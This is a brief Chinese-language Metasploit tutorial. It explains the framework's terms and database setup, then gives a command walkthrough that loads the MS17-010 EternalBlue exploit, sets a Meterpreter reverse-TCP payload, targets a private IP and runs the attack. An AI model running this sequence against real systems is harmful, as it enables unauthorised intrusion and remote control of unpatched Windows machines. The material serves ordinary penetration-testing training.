Metasploit

• 介绍
• 使用
  • 基本使用

介绍

Metasploit 是目前世界上领先的渗透测试工具，也是信息安全与渗透测试领域最大的开源项目之一。
Metasploit 提供两种不同的 UI，msfconsole 和 WebUI，主要使用 msfconsole 接口。因为 msfconsole 对 Metasploit 支持最好，可以使用所有功能。

• Metasploit Framework：
  这是一个免费的、开源的渗透测试框架，当前稳定版本是使用 Ruby 语言编写的。它拥有世界上最大的渗透测试攻击数据库，每年超过 100 万次的下载。它也是迄今为止使用 Ruby 构建的最复杂的项目之一。
• Vulnerability：
  漏洞
• Exploit：
  攻击代码或程序，它允许攻击者利用易受攻击的系统并危害其安全性。每个漏洞都有对应的漏洞利用程序。Metasploit 有超过 1700 个漏洞利用程序。
• Payload：
  攻击载荷。
• Module：
  模块是一个完整的构件，每个模块执行特定的任务，并通过几个模块组成一个单元运行。这种架构的好处是可以很容易的将自己写的利用程序和工具集成到框架中。

使用

• 启动 msfconsole
  设置 PostgreSQL 数据库，它将创建数据库用户，创建 msf 和 msf_test 数据库，配置 Metasploit 使用数据库

1. service postgresql start
2. msfdb init
3. msfconsole

• 管理 Metasploit Framework 数据库

1. msfdb

• 修改数据库配置文件

1. 直接编辑 database.yml
   文件位于 /usr/share/metasploit-framework/config/database.yml

• 检查数据库连接情况

1. 启动 msfconsole，然后执行 db_status
2. db_disconnect ，断开连接

基本使用

msfconsole										    #进入框架
search  ms17_010                                    # 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue        # 使用use进入模块
info     										    #使用info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp    	#设置攻击载荷
show options    									#查看模块需要配置的参数
set  RHOST  192.168.100.158    					    #设置参数
exploit / run     								    #攻击
后渗透阶段											#后渗透阶段